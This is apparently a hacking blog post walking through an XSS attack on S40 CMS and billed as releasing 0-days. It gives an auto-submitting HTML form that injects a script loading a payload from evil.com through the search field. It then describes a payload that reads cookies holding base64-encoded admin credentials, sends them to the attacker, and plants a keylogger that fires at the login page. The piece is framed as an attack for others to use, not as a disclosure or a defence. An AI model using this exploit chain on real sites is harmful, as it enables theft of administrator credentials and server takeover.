Using XSS to pwn

In this post i will go over how to pwn a server by exploiting just XSS. This is some what special circumstance but we will go over that a little later. I will also be targeting S40 CMS for this post and giving out a few XSS 0-days in the process :)

So our goal is to get the admin user name and password, but using XSS is not always the best way to go about it "note i said get login details not stealing sessions". Now due to some major security issues in S40 i can show you two ways to get the admin creds. If our victim checks the remember me box at the admin login page, S40 saves the user name and password "base64 encoded" in your cookie. Which brings us to our first XSS. S40 has a handy search function that happens to be open to XSS and allows for our entery point. Lets look at our attack code:

xss_attack.html #Remember we have to get our victim to visit this page.
[script languaje="JavaScript"]
function func(){
document.go.submit();
}
[/script]
[form action="http://s40.biz" name="go" method="POST"]
[input type='hidden' name='gsearchfield' value='"][script src=http://evil.com/xss.js][/script]']
[script]func();[/script]

The bold portion is our injection, the rest is just our form and javascript to auto submit. We see its including xss.js "Our XSS payload" from exil.com. Now xss.js's job is to get the cookie, scan it for login details and if it finds them, send them on to us. If not thats ok we can just move on to the next phase and have it inject more XSS in the user name "sfu" var in the cookie.

We do this because later when the victim goes to login, S40 will look in the cookie for user name and password data. Then if it finds data it push it into the appropriate input fields on the login page. So if we injected a key logger as our payload for the second phase, and the admin goes to login your payload gets run and you get the login details! There you have it, going from XSS to pwn. It just takes a perfect storm of XSS which is sadly all to common.